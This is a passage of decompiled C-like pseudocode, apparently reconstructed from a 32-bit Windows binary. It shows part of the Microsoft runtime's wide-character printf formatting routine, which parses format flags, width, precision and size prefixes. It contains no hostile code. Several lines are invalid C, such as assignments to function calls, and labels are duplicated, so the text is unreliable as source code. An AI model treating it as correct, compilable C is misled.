                            															 *(_t525 - 0x4d8) =  *(( *(_t525 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            														}
                            													}
                            													L7:
                            													 *(_t525 - 0x450) =  *(_t525 - 0x4d8);
                            													_t519 =  *(_t525 - 0x450) * 9;
                            													_t490 =  *(_t525 - 0x45c);
                            													_t510 = ( *(_t519 + _t490 + 0x4083d0) & 0x000000ff) >> 4;
                            													 *(_t525 - 0x45c) = ( *(_t519 + _t490 + 0x4083d0) & 0x000000ff) >> 4;
                            													if( *(_t525 - 0x45c) != 8) {
                            														L16:
                            														 *(_t525 - 0x4e0) =  *(_t525 - 0x45c);
                            														__eflags =  *(_t525 - 0x4e0) - 7;
                            														if( *(_t525 - 0x4e0) > 7) {
                            															continue;
                            														}
                            														L17:
                            														switch( *((intOrPtr*)( *(_t525 - 0x4e0) * 4 +  &M00423E84))) {
                            															case 0:
                            																L18:
                            																 *(_t525 - 0xc) = 1;
                            																E00423F90( *(_t525 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t525 + 8)), _t525 - 0x44c);
                            																_t527 = _t527 + 0xc;
                            																goto L214;
                            															case 1:
                            																L19:
                            																 *(__ebp - 0x2c) = 0;
                            																__ecx =  *(__ebp - 0x2c);
                            																 *(__ebp - 0x28) = __ecx;
                            																__edx =  *(__ebp - 0x28);
                            																 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																__eax =  *(__ebp - 0x18);
                            																 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            																 *(__ebp - 0x10) = 0;
                            																 *(__ebp - 0x30) = 0xffffffff;
                            																 *(__ebp - 0xc) = 0;
                            																goto L214;
                            															case 2:
                            																L20:
                            																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																 *(__ebp - 0x4e4) = __ecx;
                            																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            																__eflags =  *(__ebp - 0x4e4) - 0x10;
                            																if( *(__ebp - 0x4e4) > 0x10) {
                            																	goto L27;
                            																}
                            																L21:
                            																_t57 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            																__ecx =  *_t57 & 0x000000ff;
                            																switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            																	case 0:
                            																		goto L24;
                            																	case 1:
                            																		goto L25;
                            																	case 2:
                            																		goto L23;
                            																	case 3:
                            																		goto L22;
                            																	case 4:
                            																		goto L26;
                            																	case 5:
                            																		goto L27;
                            																}
                            															case 3:
                            																L28:
                            																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																	__edx =  *(__ebp - 0x18);
                            																	__edx =  *(__ebp - 0x18) * 0xa;
                            																	__eflags = __edx;
                            																	_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																	__ecx = __edx + _t81;
                            																	 *(__ebp - 0x18) = __ecx;
                            																} else {
                            																	__edx = __ebp + 0x14;
                            																	 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x18);
                            																	if( *(__ebp - 0x18) < 0) {
                            																		__eax =  *(__ebp - 0x10);
                            																		__eax =  *(__ebp - 0x10) | 0x00000004;
                            																		__eflags = __eax;
                            																		 *(__ebp - 0x10) = __eax;
                            																		__ecx =  *(__ebp - 0x18);
                            																		__ecx =  ~( *(__ebp - 0x18));
                            																		 *(__ebp - 0x18) = __ecx;
                            																	}
                            																}
                            																L33:
                            																goto L214;
                            															case 4:
                            																L34:
                            																 *(__ebp - 0x30) = 0;
                            																goto L214;
                            															case 5:
                            																L35:
                            																__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            																__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            																if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            																	__ecx =  *(__ebp - 0x30);
                            																	__ecx =  *(__ebp - 0x30) * 0xa;
                            																	__eflags = __ecx;
                            																	_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            																	__eax = __ecx + _t92;
                            																	 *(__ebp - 0x30) = __ecx + _t92;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x30);
                            																	if( *(__ebp - 0x30) < 0) {
                            																		 *(__ebp - 0x30) = 0xffffffff;
                            																	}
                            																}
                            																goto L214;
                            															case 6:
                            																L41:
                            																__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            																 *(__ebp - 0x4e8) = __ecx;
                            																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            																__eflags =  *(__ebp - 0x4e8) - 0x2e;
                            																if( *(__ebp - 0x4e8) > 0x2e) {
                            																	L64:
                            																	goto L214;
                            																}
                            																L42:
                            																_t100 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            																__ecx =  *_t100 & 0x000000ff;
                            																switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            																	case 0:
                            																		L47:
                            																		__ecx =  *(__ebp + 0xc);
                            																		__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
                            																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            																			L50:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
                            																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            																				L53:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *__ecx & 0x0000ffff;
                            																				__eflags = ( *__ecx & 0x0000ffff) - 0x64;
                            																				if(( *__ecx & 0x0000ffff) == 0x64) {
                            																					L59:
                            																					L61:
                            																					goto L64;
                            																				}
                            																				L54:
                            																				__eax =  *(__ebp + 0xc);
                            																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																				__eflags = __ecx - 0x69;
                            																				if(__ecx == 0x69) {
                            																					goto L59;
                            																				}
                            																				L55:
                            																				__edx =  *(__ebp + 0xc);
                            																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
                            																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																					goto L59;
                            																				}
                            																				L56:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *__ecx & 0x0000ffff;
                            																				__eflags = ( *__ecx & 0x0000ffff) - 0x75;
                            																				if(( *__ecx & 0x0000ffff) == 0x75) {
                            																					goto L59;
                            																				}
                            																				L57:
                            																				__eax =  *(__ebp + 0xc);
                            																				__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																				__eflags = __ecx - 0x78;
                            																				if(__ecx == 0x78) {
                            																					goto L59;
                            																				}
                            																				L58:
                            																				__edx =  *(__ebp + 0xc);
                            																				__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																				__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
                            																				if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																					 *(__ebp - 0x45c) = 0;
                            																					goto L18;
                            																				}
                            																				goto L59;
                            																			}
                            																			L51:
                            																			__eax =  *(__ebp + 0xc);
                            																			__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																			__eflags = __ecx - 0x32;
                            																			if(__ecx != 0x32) {
                            																				goto L53;
                            																			} else {
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																				goto L61;
                            																			}
                            																		}
                            																		L48:
                            																		__eax =  *(__ebp + 0xc);
                            																		__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																		__eflags = __ecx - 0x34;
                            																		if(__ecx != 0x34) {
                            																			goto L50;
                            																		} else {
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																			goto L61;
                            																		}
                            																	case 1:
                            																		L62:
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																		 *(__ebp - 0x10) = __ecx;
                            																		goto L64;
                            																	case 2:
                            																		L43:
                            																		__edx =  *(__ebp + 0xc);
                            																		__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
                            																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            																			__eax =  *(__ebp - 0x10);
                            																			__eax =  *(__ebp - 0x10) | 0x00000010;
                            																			__eflags = __eax;
                            																			 *(__ebp - 0x10) = __eax;
                            																		} else {
                            																			__ecx =  *(__ebp + 0xc);
                            																			__ecx =  *(__ebp + 0xc) + 2;
                            																			 *(__ebp + 0xc) = __ecx;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																		}
                            																		goto L64;
                            																	case 3:
                            																		L63:
                            																		__edx =  *(__ebp - 0x10);
                            																		__edx =  *(__ebp - 0x10) | 0x00000800;
                            																		__eflags = __edx;
                            																		 *(__ebp - 0x10) = __edx;
                            																		goto L64;
                            																	case 4:
                            																		goto L64;
                            																}
                            															case 7:
                            																L65:
                            																__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            																__ecx =  *(__ebp - 0x4ec);
                            																__ecx =  *(__ebp - 0x4ec) - 0x41;
                            																 *(__ebp - 0x4ec) = __ecx;
                            																__eflags =  *(__ebp - 0x4ec) - 0x37;
                            																if( *(__ebp - 0x4ec) > 0x37) {
                            																	while(1) {
                            																		L187:
                            																		__eflags =  *(__ebp - 0x28);
                            																		if( *(__ebp - 0x28) != 0) {
                            																			goto L212;
                            																		}
                            																		goto L188;
                            																	}
                            																}
                            																L66:
                            																_t141 =  *(__ebp - 0x4ec) + 0x423f50; // 0xcccccc0d
                            																__eax =  *_t141 & 0x000000ff;
                            																switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423F14))) {
                            																	case 0:
                            																		L120:
                            																		 *(__ebp - 0x2c) = 1;
                            																		 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																		__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																		 *(__ebp - 0x454) = __ax;
                            																		goto L121;
                            																	case 1:
                            																		L67:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																			__edx =  *(__ebp - 0x10);
                            																			__edx =  *(__ebp - 0x10) | 0x00000020;
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x10) = __edx;
                            																		}
                            																		goto L69;
                            																	case 2:
                            																		L82:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																			__eflags = __ecx;
                            																			 *(__ebp - 0x10) = __ecx;
                            																		}
                            																		goto L84;
                            																	case 3:
                            																		L144:
                            																		 *(__ebp - 0x460) = 7;
                            																		L145:
                            																		 *(__ebp - 8) = 0x10;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																			__edx = 0x30;
                            																			 *(__ebp - 0x14) = __dx;
                            																			 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
                            																			__eflags =  *(__ebp - 0x460) + 0x51;
                            																			 *(__ebp - 0x12) = __ax;
                            																			 *(__ebp - 0x1c) = 2;
                            																		}
                            																		goto L150;
                            																	case 4:
                            																		L75:
                            																		__eax = __ebp + 0x14;
                            																		 *(__ebp - 0x474) = E0041C290(__ebp + 0x14);
                            																		__eflags =  *(__ebp - 0x474);
                            																		if( *(__ebp - 0x474) == 0) {
                            																			L77:
                            																			__edx =  *0x60b4f0; // 0x407424
                            																			 *(__ebp - 4) = __edx;
                            																			__eax =  *(__ebp - 4);
                            																			 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																			L81:
                            																			goto L187;
                            																		}
                            																		L76:
                            																		__ecx =  *(__ebp - 0x474);
                            																		__eflags =  *(__ecx + 4);
                            																		if( *(__ecx + 4) != 0) {
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000800;
                            																			if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																				 *(__ebp - 0xc) = 0;
                            																				__edx =  *(__ebp - 0x474);
                            																				__eax =  *(__edx + 4);
                            																				 *(__ebp - 4) =  *(__edx + 4);
                            																				__ecx =  *(__ebp - 0x474);
                            																				__edx =  *__ecx;
                            																				 *(__ebp - 0x24) =  *__ecx;
                            																			} else {
                            																				__edx =  *(__ebp - 0x474);
                            																				__eax =  *(__edx + 4);
                            																				 *(__ebp - 4) =  *(__edx + 4);
                            																				__ecx =  *(__ebp - 0x474);
                            																				__eax =  *__ecx;
                            																				asm("cdq");
                            																				 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																				 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																				 *(__ebp - 0xc) = 1;
                            																			}
                            																			goto L81;
                            																		}
                            																		goto L77;
                            																	case 5:
                            																		L121:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		__edx = __ebp - 0x448;
                            																		 *(__ebp - 4) = __ebp - 0x448;
                            																		 *(__ebp - 0x44) = 0x200;
                            																		__eflags =  *(__ebp - 0x30);
                            																		if( *(__ebp - 0x30) >= 0) {
                            																			L123:
                            																			__eflags =  *(__ebp - 0x30);
                            																			if( *(__ebp - 0x30) != 0) {
                            																				L126:
                            																				__eflags =  *(__ebp - 0x30) - 0x200;
                            																				if( *(__ebp - 0x30) > 0x200) {
                            																					 *(__ebp - 0x30) = 0x200;
                            																				}
                            																				L128:
                            																				__eflags =  *(__ebp - 0x30) - 0xa3;
                            																				if( *(__ebp - 0x30) > 0xa3) {
                            																					__ecx =  *(__ebp - 0x30);
                            																					__ecx =  *(__ebp - 0x30) + 0x15d;
                            																					 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																					__eflags =  *(__ebp - 0x20);
                            																					if( *(__ebp - 0x20) == 0) {
                            																						 *(__ebp - 0x30) = 0xa3;
                            																					} else {
                            																						__edx =  *(__ebp - 0x20);
                            																						 *(__ebp - 4) =  *(__ebp - 0x20);
                            																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																					}
                            																				}
                            																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																				 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																				__edx =  *(__ebp + 0x14);
                            																				__eax =  *(__edx - 8);
                            																				__ecx =  *(__edx - 4);
                            																				 *(__ebp - 0x490) =  *(__edx - 8);
                            																				 *(__ebp - 0x48c) =  *(__edx - 4);
                            																				__ecx = __ebp - 0x40;
                            																				_push(E0040D3B0(__ebp - 0x40));
                            																				__edx =  *(__ebp - 0x2c);
                            																				_push( *(__ebp - 0x2c));
                            																				__eax =  *(__ebp - 0x30);
                            																				_push( *(__ebp - 0x30));
                            																				__ecx =  *(__ebp - 0x454);
                            																				_push( *(__ebp - 0x454));
                            																				__edx =  *(__ebp - 0x44);
                            																				_push( *(__ebp - 0x44));
                            																				__eax =  *(__ebp - 4);
                            																				_push( *(__ebp - 4));
                            																				__ecx = __ebp - 0x490;
                            																				_push(__ebp - 0x490);
                            																				__edx =  *0x60b3cc; // 0x7e8c4bdb
                            																				E00410200(__edx) =  *__eax();
                            																				__esp = __esp + 0x1c;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																				if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																					__eflags =  *(__ebp - 0x30);
                            																					if( *(__ebp - 0x30) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__ecx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																						E00410200(__edx) =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																				}
                            																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																				__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																				if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__edx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																						__eax =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																				}
                            																				__ecx =  *(__ebp - 4);
                            																				__edx =  *( *(__ebp - 4));
                            																				__eflags =  *( *(__ebp - 4)) - 0x2d;
                            																				if( *( *(__ebp - 4)) == 0x2d) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																					__ecx =  *(__ebp - 4);
                            																					__ecx =  *(__ebp - 4) + 1;
                            																					__eflags = __ecx;
                            																					 *(__ebp - 4) = __ecx;
                            																				}
                            																				__edx =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				do {
                            																					L187:
                            																					__eflags =  *(__ebp - 0x28);
                            																					if( *(__ebp - 0x28) != 0) {
                            																						goto L212;
                            																					}
                            																					goto L188;
                            																				} while ( *(__ebp - 0x4ec) > 0x37);
                            																				goto L66;
                            																			}
                            																			L124:
                            																			__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																			__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
                            																			if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            																				goto L126;
                            																			}
                            																			L125:
                            																			 *(__ebp - 0x30) = 1;
                            																			goto L128;
                            																		}
                            																		L122:
                            																		 *(__ebp - 0x30) = 6;
                            																		goto L128;
                            																	case 6:
                            																		L69:
                            																		 *(__ebp - 0xc) = 1;
                            																		__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																		 *(__ebp - 0x458) = __ax;
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																		__eflags = __ecx;
                            																		if(__ecx == 0) {
                            																			__cx =  *(__ebp - 0x458);
                            																			 *(__ebp - 0x448) = __cx;
                            																		} else {
                            																			 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
                            																			 *(__ebp - 0x470) = __dl;
                            																			 *((char*)(__ebp - 0x46f)) = 0;
                            																			__ecx = __ebp - 0x40;
                            																			__eax = E0040D3B0(__ebp - 0x40);
                            																			__ecx = __ebp - 0x40;
                            																			E0040D3B0(__ebp - 0x40) =  *__eax;
                            																			__ecx =  *(__ebp - 0x448 + 0xac);
                            																			__edx = __ebp - 0x470;
                            																			__eax = __ebp - 0x448;
                            																			__eax = E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
                            																			__eflags = __eax;
                            																			if(__eax < 0) {
                            																				 *(__ebp - 0x28) = 1;
                            																			}
                            																		}
                            																		__edx = __ebp - 0x448;
                            																		 *(__ebp - 4) = __ebp - 0x448;
                            																		 *(__ebp - 0x24) = 1;
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																	case 7:
                            																		L141:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																		 *(__ebp - 8) = 0xa;
                            																		L150:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																		__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																		if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																			if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																				__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																						__ecx = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						__edx = 0;
                            																						__eflags = 0;
                            																						 *(__ebp - 0x4a0) = __eax;
                            																						 *(__ebp - 0x49c) = 0;
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						asm("cdq");
                            																						 *(__ebp - 0x4a0) = __eax;
                            																						 *(__ebp - 0x49c) = __edx;
                            																					}
                            																				} else {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																					if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																						__ecx = __ebp + 0x14;
                            																						E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																						asm("cdq");
                            																						 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            																						 *(__ebp - 0x49c) = __edx;
                            																					} else {
                            																						__eax = __ebp + 0x14;
                            																						__eax = E0041C290(__ebp + 0x14);
                            																						__ax = __eax;
                            																						asm("cdq");
                            																						 *(__ebp - 0x4a0) = __eax;
                            																						 *(__ebp - 0x49c) = __edx;
                            																					}
                            																				}
                            																			} else {
                            																				__eax = __ebp + 0x14;
                            																				 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x49c) = __edx;
                            																			}
                            																		} else {
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																			 *(__ebp - 0x49c) = __edx;
                            																		}
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																		if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																			goto L167;
                            																		}
                            																	case 8:
                            																		L106:
                            																		__eax = __ebp + 0x14;
                            																		 *(__ebp - 0x484) = E0041C290(__ebp + 0x14);
                            																		__eax = E00420F80();
                            																		__eflags = __eax;
                            																		if(__eax != 0) {
                            																			L116:
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																			__eflags = __ecx;
                            																			if(__ecx == 0) {
                            																				__ecx =  *(__ebp - 0x484);
                            																				__edx =  *(__ebp - 0x44c);
                            																				 *__ecx =  *(__ebp - 0x44c);
                            																			} else {
                            																				__edx =  *(__ebp - 0x484);
                            																				__ax =  *(__ebp - 0x44c);
                            																				 *( *(__ebp - 0x484)) = __ax;
                            																			}
                            																			 *(__ebp - 0x28) = 1;
                            																			while(1) {
                            																				L187:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L212;
                            																				}
                            																				goto L188;
                            																			}
                            																		}
                            																		L107:
                            																		__ecx = 0;
                            																		__eflags = 0;
                            																		if(0 == 0) {
                            																			 *(__ebp - 0x4f4) = 0;
                            																		} else {
                            																			 *(__ebp - 0x4f4) = 1;
                            																		}
                            																		__edx =  *(__ebp - 0x4f4);
                            																		 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            																		__eflags =  *(__ebp - 0x488);
                            																		if( *(__ebp - 0x488) == 0) {
                            																			_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																			_push(0);
                            																			_push(0x695);
                            																			_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																			_push(2);
                            																			__eax = L0040E1A0();
                            																			__esp = __esp + 0x14;
                            																			__eflags = __eax - 1;
                            																			if(__eax == 1) {
                            																				asm("int3");
                            																			}
                            																		}
                            																		__eflags =  *(__ebp - 0x488);
                            																		if( *(__ebp - 0x488) != 0) {
                            																			L115:
                            																			while(1) {
                            																				L187:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L212;
                            																				}
                            																				goto L188;
                            																			}
                            																		} else {
                            																			L114:
                            																			 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																			__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																			 *(__ebp - 0x4cc) = 0xffffffff;
                            																			__ecx = __ebp - 0x40;
                            																			__eax = E0040D380(__ecx);
                            																			__eax =  *(__ebp - 0x4cc);
                            																			goto L225;
                            																		}
                            																	case 9:
                            																		L148:
                            																		 *(__ebp - 8) = 8;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000080;
                            																		if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																			__edx =  *(__ebp - 0x10);
                            																			__edx =  *(__ebp - 0x10) | 0x00000200;
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x10) = __edx;
                            																		}
                            																		while(1) {
                            																			L150:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
